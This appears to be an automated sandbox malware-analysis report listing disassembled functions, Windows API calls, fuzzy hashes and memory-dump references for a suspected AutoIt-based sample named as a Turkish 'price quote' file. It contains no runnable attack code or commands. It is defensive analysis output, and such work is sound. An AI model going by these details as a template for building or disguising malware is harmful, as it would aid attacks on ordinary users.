Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: db75374a4870402ac6c40c697c61ae3308ae19b01ff137cfe960edfb412bd18f
Instruction ID: 03b760dbd9a8ca5ea7f850dae06df70960c807f7f3ecf4969182751bb9c60762
Opcode Fuzzy Hash: db75374a4870402ac6c40c697c61ae3308ae19b01ff137cfe960edfb412bd18f
Instruction Fuzzy Hash: 15113631204705AFDB25DE09C880B76B7E9AB44764F18C42EE99B8AB51C770E945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 009B5000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 009B4C7D: RtlAllocateHeap.NTDLL(00000008,00981129,00000000,?,009B2E29,00000001,00000364,?,?,?,009AF2DE,009B3863,00A51444,?,0099FDF5,?), ref: 009B4CBE

_free.LIBCMT ref: 009B506C

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
Instruction ID: a2a87843f5f14e4cf1fe50fe0d46bebc68806f06b30215e92c5899b76a7649ff
Opcode Fuzzy Hash: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
Instruction Fuzzy Hash: 510126722047056BE3219F659881BDAFBEDFB89370F26091DE18893280EA30A805C6B4

Uniqueness

Uniqueness Score: -1.00%

Function 009AE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
Instruction ID: a3d938786b48cfaeaa409e091a625eef373685b00a642bf9704ccaeaf0d8a7fb
Opcode Fuzzy Hash: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
Instruction Fuzzy Hash: F4F0F432511A14A6D6313A698D09B9B339C9FD3330F100F15F825921D2DB74E80186E9

Uniqueness

Uniqueness Score: -1.00%

Function 009B4C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00981129,00000000,?,009B2E29,00000001,00000364,?,?,?,009AF2DE,009B3863,00A51444,?,0099FDF5,?), ref: 009B4CBE

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f7be3ecd2128e477673d95c618e072c540dc19d6fbc48a86305b042af498fde8
Instruction ID: b4060e2c1ba49087fc648489985eed1a55fb94d02fe61e9f1688ebce19f71bb7
Opcode Fuzzy Hash: f7be3ecd2128e477673d95c618e072c540dc19d6fbc48a86305b042af498fde8
Instruction Fuzzy Hash: 7DF0E03154222467DB215F619E05BD63F4CBF81F71F148121FC99D6183CA70DC0165D0

Uniqueness

Uniqueness Score: -1.00%

Function 009BFDC4 Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 009B3820: RtlAllocateHeap.NTDLL(00000000,?,00A51444,?,0099FDF5,?,?,0098A976,00000010,00A51440,009813FC,?,009813C6,?,00981129), ref: 009B3852

_free.LIBCMT ref: 009BFDE4

Part of subcall function 009B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000), ref: 009B29DE
Part of subcall function 009B29C8: GetLastError.KERNEL32(00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000,00000000), ref: 009B29F0

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: 54e118fd559bb6b3447d0a27577171fce500388a0bc3b261dd129590af39c21a
Instruction ID: f32c00dfa07ed3d32c868af943b70ed3ba1a7a40d90af553b083fd1af92b0b8a
Opcode Fuzzy Hash: 54e118fd559bb6b3447d0a27577171fce500388a0bc3b261dd129590af39c21a
Instruction Fuzzy Hash: 00F090B20057009FE734DF51D981B92B7F8FB44725F20882EE69A87A91CB74F844CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 009B3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00A51444,?,0099FDF5,?,?,0098A976,00000010,00A51440,009813FC,?,009813C6,?,00981129), ref: 009B3852

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 23cc9449971297e8d25b8cdd0b5f33dfcd344678a03fd4a08e3fd8bcc8a2f5a6
Instruction ID: b957077506a8760dbd6bea0bdc8bdabe27d4ee5ca022974963f604cefe91c606
Opcode Fuzzy Hash: 23cc9449971297e8d25b8cdd0b5f33dfcd344678a03fd4a08e3fd8bcc8a2f5a6
Instruction Fuzzy Hash: A6E02231140224AAE731AABB9E00BDB375CBFC37B0F168134BC1596890DB60DE0282E3

Uniqueness

Uniqueness Score: -1.00%

Function 009B4D7A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 009B4D9C

Part of subcall function 009B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000), ref: 009B29DE
Part of subcall function 009B29C8: GetLastError.KERNEL32(00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000,00000000), ref: 009B29F0

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
Instruction ID: 2b483954457ba200f27d8bde8280d6f729cdfd0cc4410292e34e2b026ec9fe6a
Opcode Fuzzy Hash: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
Instruction Fuzzy Hash: 01E06D361002059F8720CF6CD500AC2B7F8EF843307208929E89DD7211D331F812CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00984F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00A51418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00984F6D

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 6d6e4d2fe1d7190a4e0a5dca732cb40a4f995c57c1188cc12b831a41c5fa592e
Instruction ID: 996e711f67bbe7b69e4a09beafcfb05558bae50e45fd8819aee9d262b18d38d9
Opcode Fuzzy Hash: 6d6e4d2fe1d7190a4e0a5dca732cb40a4f995c57c1188cc12b831a41c5fa592e
Instruction Fuzzy Hash: CDF03971105752CFDB34AF64D490822BBE8BF143293258E7EE2EA82621C7359844DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00982DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00982DC4

Part of subcall function 00986B57: _wcslen.LIBCMT ref: 00986B6A

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 1adaa06706fd866097f78b2e13228b3bbf3f71ca3f947496904887bdc26b6ff4
Instruction ID: fa9223afe8a31a1a2caa3765c8e28cd49e60d49f705c0c7a5b09eb89c1fcbf82
Opcode Fuzzy Hash: 1adaa06706fd866097f78b2e13228b3bbf3f71ca3f947496904887bdc26b6ff4
Instruction Fuzzy Hash: 98E0CD76A042245BC710E2989C05FDA77DDDFC8790F044075FD09D7248DA70ED808651

Uniqueness

Uniqueness Score: -1.00%

Function 009F2693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 009F26B5

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction ID: b5a78397b752041097fd6734d4d3a7eaee7711e5724fe50676232ece44177891
Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction Fuzzy Hash: 4DE04FB0609B005FDF399B28A8517B677E89F4A300F00086EF69BC2252E57268458B4D

Uniqueness

Uniqueness Score: -1.00%

Function 00982B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00983837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00983908

Part of subcall function 0098D730: GetInputState.USER32 ref: 0098D807

SetCurrentDirectoryW.KERNEL32(?), ref: 00982B6B

Part of subcall function 009830F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0098314E

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: 53c58d0a01e123f1f0d23e5fcae4a102d54f0366b5ae6f0d077f3d855514e695
Instruction ID: 40d59838b33a74add9b3bc1da2055efa313ee741ed1c1ce284aa3a87854bec91
Opcode Fuzzy Hash: 53c58d0a01e123f1f0d23e5fcae4a102d54f0366b5ae6f0d077f3d855514e695
Instruction Fuzzy Hash: 2CE0866230524406CA04BB74A8527BDE7599BD1756F40553EF546873E2CE24494A4352

Uniqueness

Uniqueness Score: -1.00%

Function 023508E0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 023508EB

Memory Dump Source

Source File: 00000000.00000002.3704784227.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2350000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction ID: c7d56fa5c704dff989dd676e50d4f94c1dddfae3440c52dd100d690aafe00a43
Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction Fuzzy Hash: D5E08C71A0521CEBEB28CBB88A18EA973B8DB08320F004654EC1EC3291D6368A40D694

Uniqueness

Uniqueness Score: -1.00%

Function 023508B0 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 023508BB

Memory Dump Source

Source File: 00000000.00000002.3704784227.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2350000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction ID: c2c40453f1746e1b821b8f7560761f578cdee1e88554915f22f9a017bf7d7a0c
Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction Fuzzy Hash: 67D0A73190620CEBCB10CFB49C04EDA73ACEB08320F004764FD19D7281D63699409790

Uniqueness

Uniqueness Score: -1.00%

Function 009C039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,009C0704,?,?,00000000,?,009C0704,00000000,0000000C), ref: 009C03B7

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 27524e543146922a14432c5bfa0f4f0c61e9ec28acc41a0add54b95ea6af45cd
Instruction ID: cda965eeefde909c94b4dd55601576e35279055284fed9f5403a1474e3f162f9
Opcode Fuzzy Hash: 27524e543146922a14432c5bfa0f4f0c61e9ec28acc41a0add54b95ea6af45cd
Instruction Fuzzy Hash: FDD06C3208010DBBDF028F84DD06EDA3BAAFB48714F018100BE1856020C732E822AB90

Uniqueness

Uniqueness Score: -1.00%

Function 00981CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00981CBC

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 6c860f5ee40e79493834638a1445b7256aaac9ed327fc65e18429d248888384e
Instruction ID: 2dd8e3da9b11631336c53d6b5c80cbc0e0034563d04f3006a7d51f8f6756dcb1
Opcode Fuzzy Hash: 6c860f5ee40e79493834638a1445b7256aaac9ed327fc65e18429d248888384e
Instruction Fuzzy Hash: FCC092362C0304AFF215CBC0BC5EF607765B358B26F048401F609AD5F3D3A22822EB50

Uniqueness

Uniqueness Score: -1.00%

Function 009F744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 00985745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0098949C,?,00008000), ref: 00985773

GetLastError.KERNEL32(00000002,00000000), ref: 009F76DE

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 1494e650f75f2420a22d1898200026a26e32398ae644689dd70fd1bdb52d4609
Instruction ID: 8fdb7582bcc50edde3210a3daed5413c05aed1a0e3062ed369bf527c1747dd57
Opcode Fuzzy Hash: 1494e650f75f2420a22d1898200026a26e32398ae644689dd70fd1bdb52d4609
Instruction Fuzzy Hash: 3B81AD302087059FCB14EF68C491B6AB7E5BF89314F04496DF9969B3A2DB30ED45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0099FC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 0099FD1F

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 8fcbf75a5daa0bd54b63c003cdeebb9b199f72c7c78ffa9bdb09b202bd730f2f
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 3431D375A00109DBCB18CF5DD4A0969FBA9FF49300B28C6A5E849CB696E731EDC1CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 023522FC Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 02352311

Memory Dump Source

Source File: 00000000.00000002.3704784227.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2350000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: d8e953a2e11ffefbfa76d8a152e1dd2c1e25a7d5058a7956555724cc987e67ce
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: FEE0BF7594010DEFDB00EFB4D5496DE7BB4EF04301F1005A1FD05D7690DB309E548A62

Uniqueness

Uniqueness Score: -1.00%

Function 02352300 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 02352311

Memory Dump Source

Source File: 00000000.00000002.3704784227.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2350000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 097ac0ad85e2d17bc03897ac3b8c52bbee03024b072c646b7b8a30ac904c92cc
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: EBE0E67594010DDFDB00EFB4D54969E7FB4EF04301F100561FD05D2280D6309D508A62

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00A19576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00999BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00999BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00A1961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A1965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00A1969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A196C9
SendMessageW.USER32 ref: 00A196F2
GetKeyState.USER32(00000011), ref: 00A1978B
GetKeyState.USER32(00000009), ref: 00A19798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A197AE
GetKeyState.USER32(00000010), ref: 00A197B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A197E9
SendMessageW.USER32 ref: 00A19810
SendMessageW.USER32(?,00001030,?,00A17E95), ref: 00A19918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00A1992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00A19941
SetCapture.USER32(?), ref: 00A1994A
ClientToScreen.USER32(?,?), ref: 00A199AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00A199BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A199D6
ReleaseCapture.USER32 ref: 00A199E1
GetCursorPos.USER32(?), ref: 00A19A19
ScreenToClient.USER32(?,?), ref: 00A19A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 00A19A80
SendMessageW.USER32 ref: 00A19AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00A19AEB
SendMessageW.USER32 ref: 00A19B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00A19B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00A19B4A
GetCursorPos.USER32(?), ref: 00A19B68
ScreenToClient.USER32(?,?), ref: 00A19B75
GetParent.USER32(?), ref: 00A19B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 00A19BFA
SendMessageW.USER32 ref: 00A19C2B
ClientToScreen.USER32(?,?), ref: 00A19C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00A19CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 00A19CDE
SendMessageW.USER32 ref: 00A19D01
